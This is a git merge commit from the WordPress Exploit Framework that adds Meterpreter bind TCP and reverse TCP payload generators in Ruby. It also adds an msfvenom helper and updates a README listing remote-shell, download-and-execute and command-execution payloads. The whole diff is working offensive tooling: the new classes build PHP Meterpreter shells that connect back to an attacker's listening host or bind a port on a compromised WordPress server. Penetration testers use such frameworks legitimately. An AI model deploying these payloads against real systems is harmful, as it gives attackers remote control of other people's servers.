Merge branch 'feature/meterpreter_payloads' into development

Author: rastating

README.md

@@ -76,10 +76,12 @@ Exploit modules require you to specify a payload which subsequently gets execute
 * **bind_php:** uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
 * **custom:** uploads and executes a custom PHP script.
 * **download_exec:** downloads and runs a remote executable file.
+* **meterpreter_bind_tcp:** a Meterpreter bind TCP payload generated using msfvenom.
+* **meterpreter_reverse_tcp:** a Meterpreter reverse  TCP payload generated using msfvenom.
 * **exec:** runs a shell command on the remote server and returns the output to the WPXF session.
 * **reverse_tcp:** uploads a script that will establish a reverse TCP shell.
 
-All these payloads, with the exception of ```custom```, will delete themselves after they have been executed, to avoid leaving them lying around on the target machine after use or in the event that they are being used to establish a shell which fails.
+All these payloads, with the exception of ```custom``` and the Meterpreter payloads, will delete themselves after they have been executed, to avoid leaving them lying around on the target machine after use or in the event that they are being used to establish a shell which fails.
 
 ### How can I write my own modules and payloads?
 Guides on writing modules and payloads can be found on [The Wiki](https://github.com/rastating/wordpress-exploit-framework/wiki) and full documentation of the API can be found at http://www.getwpxf.com/.

payloads/meterpreter_bind_tcp.rb

@@ -0,0 +1,61 @@
+module Wpxf::Payloads
+  # A Meterpreter bind TCP payload generator.
+  class MeterpreterBindTcp < Wpxf::Payload
+    include Wpxf
+    include Wpxf::Options
+    include Wpxf::Payloads::MsfVenomHelper
+
+    def initialize
+      super
+
+      register_msfvenom_options
+      register_options([
+        StringOption.new(
+          name: 'rhost',
+          required: true,
+          desc: 'The address of the host listening for a connection'
+        ),
+        PortOption.new(
+          name: 'lport',
+          required: true,
+          default: 4444,
+          desc: 'The port being used to listen for incoming connections'
+        ),
+        BooleanOption.new(
+          name: 'use_ipv6',
+          required: true,
+          default: false,
+          desc: 'Bind to an IPv6 address'
+        )
+      ])
+    end
+
+    def host
+      escape_single_quotes(datastore['rhost'])
+    end
+
+    def lport
+      normalized_option_value('lport')
+    end
+
+    def use_ipv6
+      normalized_option_value('use_ipv6')
+    end
+
+    def raw
+      msfvenom_payload
+    end
+
+    def msfvenom_payload_name
+      if use_ipv6
+        'php/meterpreter/bind_tcp_ipv6'
+      else
+        'php/meterpreter/bind_tcp'
+      end
+    end
+
+    def prepare(mod)
+      generate_msfvenom_payload(mod, msfvenom_payload_name, "RHOST=#{host}", "LPORT=#{lport}")
+    end
+  end
+end

payloads/meterpreter_reverse_tcp.rb

@@ -0,0 +1,43 @@
+module Wpxf::Payloads
+  # A Meterpreter reverse TCP payload generator.
+  class MeterpreterReverseTcp < Wpxf::Payload
+    include Wpxf
+    include Wpxf::Options
+    include Wpxf::Payloads::MsfVenomHelper
+
+    def initialize
+      super
+
+      register_msfvenom_options
+      register_options([
+        StringOption.new(
+          name: 'lhost',
+          required: true,
+          desc: 'The address of the host listening for a connection'
+        ),
+        PortOption.new(
+          name: 'lport',
+          required: true,
+          default: 4444,
+          desc: 'The port being used to listen for incoming connections'
+        )
+      ])
+    end
+
+    def host
+      escape_single_quotes(datastore['lhost'])
+    end
+
+    def lport
+      normalized_option_value('lport')
+    end
+
+    def raw
+      msfvenom_payload
+    end
+
+    def prepare(mod)
+      generate_msfvenom_payload(mod, 'php/meterpreter/reverse_tcp', "LHOST=#{host}", "LPORT=#{lport}")
+    end
+  end
+end

payloads/msfvenom_helper.rb

@@ -0,0 +1,46 @@
+require 'open3'
+
+# Provides common functionality for generating payloads using msfvenom.
+module Wpxf::Payloads::MsfVenomHelper
+  include Wpxf
+  include Wpxf::Options
+
+  def register_msfvenom_options
+    register_options([
+      StringOption.new(
+        name: 'msfvenom',
+        required: true,
+        default: 'msfvenom',
+        desc: 'The path to the msfvenom executable'
+      )
+    ])
+  end
+
+  def msfvenom
+    normalized_option_value('msfvenom')
+  end
+
+  def msfvenom_payload
+    @meterpreter_payload
+  end
+
+  def generate_msfvenom_payload(mod, payload_name, *args)
+    mod.emit_info 'Generating payload...'
+    begin
+      stdout, stderr = Open3.capture3(msfvenom, '-p', payload_name, *args)
+    rescue Errno::ENOENT => e
+      mod.emit_error e.to_s, true
+      mod.emit_error 'msfvenom not found - check the msfvenom payload option'
+      return false
+    end
+
+    if stdout.empty?
+      mod.emit_error 'Failed to generate the payload'
+      mod.emit_error stderr
+      return false
+    end
+
+    @meterpreter_payload = stdout
+    true
+  end
+end